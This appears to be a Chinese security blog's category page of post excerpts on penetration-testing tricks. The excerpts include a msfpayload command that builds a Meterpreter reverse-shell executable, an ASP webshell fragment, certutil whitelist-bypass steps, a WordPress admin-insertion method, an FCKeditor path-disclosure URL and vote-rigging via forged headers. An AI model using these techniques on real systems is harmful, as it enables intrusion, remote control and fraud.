其它 - 文章分类 - =_=!

BurpSuite中的安全测试插件推荐

摘要：https://www.waitalone.cn/burpsuite-plugins.html 阅读全文

posted @ 2017-06-11 05:22 =_=! 阅读(354) 评论(0) 推荐(0)

摘要：１、跨站脚本攻击(CSS or XSS, Cross Site Scripting) ２、SQL注入攻击(SQL injection) ３、远程命令执行(Code execution，个人觉得译成代码执行并不确切) ４、目录遍历(Directory traversal) ５、文件包含(File inclusion) ６、脚本代码暴露(Script source code disclosure) ... 阅读全文

posted @ 2017-04-21 18:07 =_=! 阅读(997) 评论(0) 推荐(0)

如何绕过应用程序白名单和受限的PowerShell

摘要：echo 48 65 6C 6C 6F 2C 57 6F 72 6C 64 21 >hex.txt::生成 hex.txt，机器码对应的内容是 Hallo World! certutil -decodehex hex.txt bin.txt::Hex2Bin certutil -encode bin 阅读全文

posted @ 2017-04-20 23:19 =_=! 阅读(357) 评论(0) 推荐(0)

WordPress: 通过数据库(phpMyAdmin)添加admin用户

摘要：进入phpMyAdmin, 选择用户数据库 wp_users 或者 (前缀)_users ID – pick a number (in our example, we will use the number 4). user_login – insert the username you want 阅读全文

posted @ 2016-09-04 21:44 =_=! 阅读(720) 评论(0) 推荐(0)

cmd开3389 win08 win03 win7 win2012 winxp

该文被密码保护。

posted @ 2016-01-24 22:26 =_=! 阅读(0) 评论(0) 推荐(0)

国外安全网站信息收集

摘要：大天朝黑阔不能只居一隅之地，必须要和世界接轨。昨天去新东方报了名，外面世界太大，想去外面看看。自己平日收藏了一些，网上也收集了一些，可能有些比较陈旧，暂且全都po出来。不管知名度与否，欢迎大家补充，暗网的也可以加进来，我会根据大家补充的不断分类，更新。漏洞发布类ht... 阅读全文

posted @ 2016-01-20 15:38 =_=! 阅读(985) 评论(0) 推荐(0)

Webshell实现与隐藏探究

摘要：一、什么是webshellwebshell简介webshell，顾名思义：web指的是在web服务器上，而shell是用脚本语言编写的脚本程序，webshell就是就是web的一个管理工具，可以对web服务器进行操作的权限，也叫webadmin。webshell一般是被网站管理员用于网站管理、服务器... 阅读全文

posted @ 2015-08-27 21:04 =_=! 阅读(5654) 评论(1) 推荐(1)

ddos.sh

摘要：防CC脚本阅读全文

posted @ 2015-06-12 15:12 =_=! 阅读(247) 评论(0) 推荐(0)

Shtml妙用

摘要：shtml用的是SSI指令，SSI指令虽然不多但是功能相对而言还是很强大的，在PHP禁止了命令执行函数和开了安全模式的时候可以试试看也可以在服务器允许上传shtml后缀脚本的时候试试PS:只有服务器配置了允许执行SHTML才行对于SSI 百度百科给出的解释是：SSI是为WEB服务器提供的一套命令，... 阅读全文

posted @ 2014-11-05 18:26 =_=! 阅读(485) 评论(0) 推荐(0)

BT5 msf msfpayload生成2进制 msf生成exe meterpreter监听

摘要：BT5 msf msfpayload生成2进制 msf生成exemsfpayload windows/meterpreter/reverse_tcp LHOST=192.168.85.147 LPORT=4444 X >/root/Desktop/mt.exe其它脚本msfpayload java/... 阅读全文

posted @ 2014-10-15 13:50 =_=! 阅读(437) 评论(0) 推荐(0)

删除LPT.AUX.COM.CON开头文件 RHS属性文件 asp脚本

摘要：有时候网站里面别人创建了一些带点的文件夹，还有一些利用“Windows 系统保留的文件名"创建的文件，正常情况无法删除。查了很多资料，介绍都是在CMD下删除，有时候没服务器管理员权限，也不能执行命令，难道就删不掉了么。通过查找相关资料，找到核攻击发表过的一篇文章http://lcx.cc/?i=24... 阅读全文

posted @ 2014-10-08 10:05 =_=! 阅读(492) 评论(0) 推荐(0)

渗透测试技巧分享

摘要：當ipc$遇到帶“號密碼時 password is:O*"#~)GbU[x net use \\127.0.0.1 "O*\"#~)GbU[x" /u:administrator 阅读全文

posted @ 2014-08-24 16:14 =_=! 阅读(246) 评论(0) 推荐(0)

iis7.0命令行下列网站的物理目录

摘要：cmd下执行：cd %systemroot%\system32\Inetsrv\如果您运行的是64位Windows，请从%windir%\system32\inetsrv目录而不是%windir%\syswow64\inetsrv目录中使用Appcmd.exe。C:\Windows\System32... 阅读全文

posted @ 2014-08-02 16:24 =_=! 阅读(372) 评论(0) 推荐(0)

在控制台获得局域网内的所有IP地址

摘要：在命令提示符窗口中输入以下命令：for /L %i in (0, 1, 254) do ping -a -n 1 192.168.1.%i |Find /i "reply">>E:/IPAddress.txt好了，等命令执行完毕，打开“E:/IPAddress.txt“文件，一张完整的IP与主机名的... 阅读全文

posted @ 2014-07-05 02:33 =_=! 阅读(1022) 评论(0) 推荐(0)

vbs mdb打包解包代码

摘要：pack.vbs 用来打包文件夹, 根目录为文件所在目录.Dim n, ws, fsoX, thePath Set ws = CreateObject("WScript.Shell") Set fsoX = CreateObject("Scripting.FileSystemObject") the... 阅读全文

posted @ 2014-07-03 16:49 =_=! 阅读(511) 评论(0) 推荐(0)

总结刷票办法

摘要：使用post和get包1.能伪造X-Forwarded-For的伪造2.js脚本加流量3.burp加代理阅读全文

posted @ 2014-06-04 14:31 =_=! 阅读(206) 评论(0) 推荐(0)

Hacking ColdFusion

摘要：http://yxmhero1989.blog.163.com/blog/static/1121579562014120104439831/ 阅读全文

posted @ 2014-05-08 01:41 =_=! 阅读(108) 评论(0) 推荐(0)

容错

摘要：""thenexecuterequest("cmd")%> 阅读全文

posted @ 2014-03-21 23:13 =_=! 阅读(148) 评论(0) 推荐(0)

FCKeditor报IIS路径

摘要：报IIS路径http://www.xxx.com/FCKeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=~/ 阅读全文

posted @ 2014-03-18 19:44 =_=! 阅读(134) 评论(0) 推荐(0)

NMAP的技巧

摘要：Nmap(“NetworkMapper”)是一个免费开源的网络探测和安全审计实用工具，许多系统和网络管理员也使用它完成一些任务，例如：网络清查、管理服务升级计划和监视主机或服务的正常运行时间等。这里列举了一些使用namp的一些非常cool的扫描技术，除此之外，你也可以查看在namp主页上的向导和教程。1)获取远程主机的端口信息和识别主机操作系统(GetinfoaboutremotehostportsandOSdetection)nmap-sS-P0-sV-O可以是独立IP,一个主机名或一个子网-sSTCPSYN扫描(也叫半开或隐蔽扫描)-P0选项允许你关闭ICMPping-sV选项启用版本检测阅读全文

posted @ 2013-12-16 07:29 =_=! 阅读(291) 评论(0) 推荐(0)

文章分类 - 其它